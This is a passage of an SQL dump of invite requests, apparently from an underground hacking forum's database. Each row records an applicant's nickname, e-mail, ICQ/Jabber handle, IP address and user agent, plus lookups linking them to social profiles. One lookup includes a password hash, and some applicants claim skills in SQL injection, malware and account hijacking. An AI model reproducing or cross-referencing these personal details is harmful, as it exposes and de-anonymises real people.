(1528, 1384, 0, 'Invite', 2, '{$name}', 1407785744, '[SIZE=\'4\'][COLOR=\'Sienna\']w3c[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123123123\n[b]e-mail[/b]: asdasd@asdasd.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://w3c.github.io | w3c.github.io \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1529, 1385, 0, 'Invite', 2, '{$name}', 1407788800, '[SIZE=\'4\'][COLOR=\'Sienna\']joe_doe[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: qqaaaaaaa@q.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://poisk.facecam.ru/user/3352716 | http://poisk.facecam.ru/user/3352716 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1530, 1386, 0, 'Invite', 2, '{$name}', 1407788938, '[SIZE=\'4\'][COLOR=\'Sienna\']SkyJeb[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 672409992\n[b]e-mail[/b]: au.skyjeb@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 87.217.193.81\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/skyjeb | https://twitter.com/skyjeb \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1531, 1387, 0, 'Invite', 2, '{$name}', 1407789019, '[SIZE=\'4\'][COLOR=\'Sienna\']SkyJeb[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 672409992\n[b]e-mail[/b]: au.skyjeb@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 87.217.193.81\n[*][b]real ip[/b]: 87.217.193.81\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/skyjeb | https://twitter.com/skyjeb \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1532, 1388, 0, 'Invite', 2, '{$name}', 1407789032, '[SIZE=\'4\'][COLOR=\'Sienna\']SkyJeb[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 672409992\n[b]e-mail[/b]: au.skyjeb@gmail.com\n[b]Info[/b]: Hello,\r\n\r\nI am a systems administrator and pentester for a company. My skills are malware detection and development, I can exploit any kind of SQL Injection on a website as part of my work. Now I am learning exploit research and development.\r\n\r\nAnd most important is: I don’t have CERTS. I have learned all by myself (I learn fast). For ex. If you can give me some time and some direction, I can make anything.\r\n\r\nThank you,\r\nSkyJeb\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 87.217.193.81\n[*][b]real ip[/b]: 87.217.193.81\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/skyjeb | https://twitter.com/skyjeb \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1533, 1389, 0, 'Invite', 2, '{$name}', 1407789113, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@asd.s\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1534, 1390, 0, 'Invite', 2, '{$name}', 1407792003, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname_999[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email((((((9999999\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.shayri.com/forums/member.php?u=19167 | http://www.shayri.com/forums/member.php?u=19167 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1535, 1391, 0, 'Invite', 2, '{$name}', 1407793305, '[SIZE=\'4\'][COLOR=\'Sienna\']sdasd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 23123\n[b]e-mail[/b]: aaa@bb.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.odnoklassniki.ru/group/51918203191484 | http://www.odnoklassniki.ru/group/51918203191484 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1536, 1392, 0, 'Invite', 2, '{$name}', 1407794011, '[SIZE=\'4\'][COLOR=\'Sienna\']izg0y[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: izg0y@gmail\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: 46.146.211.11\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Izg0y : Izg0y1@gmail.com : 95.30.193.97 : 32d1821827468511bcb77c1b26cc12a3\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://exploit.in/forum/index.php?showuser=49176 | https://exploit.in/forum/index.php?showuser=49176 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1537, 1393, 0, 'Invite', 2, '{$name}', 1407795495, '[SIZE=\'4\'][COLOR=\'Sienna\']Lin Kode[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 674146169\n[b]e-mail[/b]: daisukedan@null.net\n[b]Info[/b]: Hacktivist, underground hacker, security researcher, hacking feds as always.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.124.159.186\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1538, 1394, 0, 'Invite', 2, '{$name}', 1407799119, '[SIZE=\'4\'][COLOR=\'Sienna\']neuegram[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: neuegram@jabber.ccc.de\n[b]e-mail[/b]: neuegram@gmail.com\n[b]Info[/b]: Reverse-engineering (phone numbers / account hijacking), XSS/CSRF, SQLi\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 76.187.57.251\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.tf2outpost.com/user/76561198028613297 | http://www.tf2outpost.com/user/76561198028613297 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1539, 1395, 0, 'Invite', 2, '{$name}', 1407799401, '[SIZE=\'4\'][COLOR=\'Sienna\']neuegram[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: neuegram@jabber.ccc.de\n[b]e-mail[/b]: neuegram@gmail.com\n[b]Info[/b]: Reverse-engineering (phone numbers / account hijacking), XSS/CSRF, SQLi\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 76.187.57.251\n[*][b]real ip[/b]: 76.187.57.251\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.tf2outpost.com/user/76561198028613297 | http://www.tf2outpost.com/user/76561198028613297 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1540, 1396, 0, 'Invite', 2, '{$name}', 1407805119, '[SIZE=\'4\'][COLOR=\'Sienna\']oaz228[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: asdasd@sads.ss\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1541, 1397, 0, 'Invite', 2, '{$name}', 1407805702, '[SIZE=\'4\'][COLOR=\'Sienna\']ozon671[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: asdasda@asaa.aa\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ozon671.chatium.com | ozon671.chatium.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1542, 1398, 0, 'Invite', 2, '{$name}', 1407806153, '[SIZE=\'4\'][COLOR=\'Sienna\']omon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: sdjn@smnd.ss\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.154.243.53\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://d3.ru/user/omon-dey | http://d3.ru/user/omon-dey \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1543, 1399, 0, 'Invite', 2, '{$name}', 1407807031, '[SIZE=\'4\'][COLOR=\'Sienna\']namaz228[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: asdasd@sss.ss\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: 5.228.94.73\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1544, 1400, 0, 'Invite', 2, '{$name}', 1407811373, '[SIZE=\'4\'][COLOR=\'Sienna\']Amiral[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: th3amiral@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.242.246.24\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://amiral.by | amiral.by \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1545, 1401, 0, 'Invite', 2, '{$name}', 1407813123, '[SIZE=\'4\'][COLOR=\'Sienna\']oaz_tester[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: oaz@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: 